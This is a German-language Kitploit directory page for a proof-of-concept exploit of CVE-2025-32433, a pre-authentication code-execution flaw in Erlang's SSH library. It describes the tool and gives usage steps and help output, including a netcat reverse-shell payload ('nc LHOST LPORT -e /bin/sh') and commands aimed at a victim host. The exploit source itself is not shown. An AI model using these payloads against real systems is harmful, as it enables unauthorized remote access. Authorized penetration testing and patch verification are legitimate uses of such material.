Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/tenebrae93/cve-2025-3243
Payload-GenerierungSchwachstellenanalyseExploitationShellcodePenetrationstestsRemote-Access-Tool
GitHubtenebrae93/cve-2025-3243

CVE-2025-3243

Ein Proof-of-Concept-Exploit für CVE-2025-32433, eine kritische Schwachstelle in Erlangs SSH-Bibliothek, die eine Codeausführung vor der Authentifizierung über manipulierte SSH_MSG_CHANNEL_REQUEST-Pakete ermöglicht.

Repository anzeigen
71vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-32433 Erlang SSH-Bibliothek Exploit

Ein Proof-of-Concept-Exploit für CVE-2025-32433, eine kritische Schwachstelle in Erlangs SSH-Bibliothek, die vorauthentifizierte Codeausführung über manipulierte SSH_MSG_CHANNEL_REQUEST-Pakete ermöglicht.


Funktionen

  • Originaler Exploit von Matthew Keeley
  • Aktualisierte Version von Tyler Ramsbey:
    • Kommandozeilenargumente für LHOST, LPORT, RHOST und RPORT
    • Eingebaute Hilfe und Verwendung via argparse
    • Erlang-artiger Reverse-Shell-Payload mit os:cmd("nc LHOST LPORT -e /bin/sh").
    • Saubere Funktionszerlegung und Statusprotokollierung für jede Stufe

Voraussetzungen

  • Python 3
  • Ein funktionierender nc (Netcat)-Listener auf Ihrem Angriffsrechner
  • Netzwerkzugriff auf den Ziel-SSH-Dienst (Standardport 22)

Verwendung

  1. Starten Sie Ihren Listener auf dem Angriffsrechner:

    root@kitploit:~
    nc -lvnp 4444
    
  2. Führen Sie den Exploit aus:

    root@kitploit:~
    python3 CVE-2025-32433.py -lh [Attacker-IP] -lp [Attacker-Port] -rh [Victim-IP] -rp [Victim-Port]
    
  3. Warten Sie auf die Shell, die sich mit Ihrem Listener verbindet.

Hilfemenü

root@kitploit:~
$ python3 CVE-2025-32433.py -h
usage: CVE-2025-32433.py [-h] -lh LHOST -lp LPORT [-rh RHOST] [-rp RPORT]

Send a pre-auth SSH channel request with an Erlang RCE payload
to get a reverse shell

optional arguments:
  -h, --help            show this help message and exit
  -lh LHOST, --lhost LHOST
                        Local host/IP to receive the reverse shell
  -lp LPORT, --lport LPORT
                        Local port to receive the reverse shell
  -rh RHOST, --rhost RHOST
                        Target SSH server IP (default: 10.10.248.101)
  -rp RPORT, --rport RPORT
                        Target SSH server port (default: 22)

Danksagungen

  • Originalskript von Matthew Keeley (MattKeeley)
  • Diese aktualisierte Version von Tyler Ramsbey

Haftungsausschluss

Verwenden Sie diesen Code nur auf Systemen, die Ihnen gehören oder für die Sie ausdrückliche Erlaubnis zum Testen haben. Die unbefugte Ausnutzung von Schwachstellen ist illegal und unethisch.

Tool herunterladen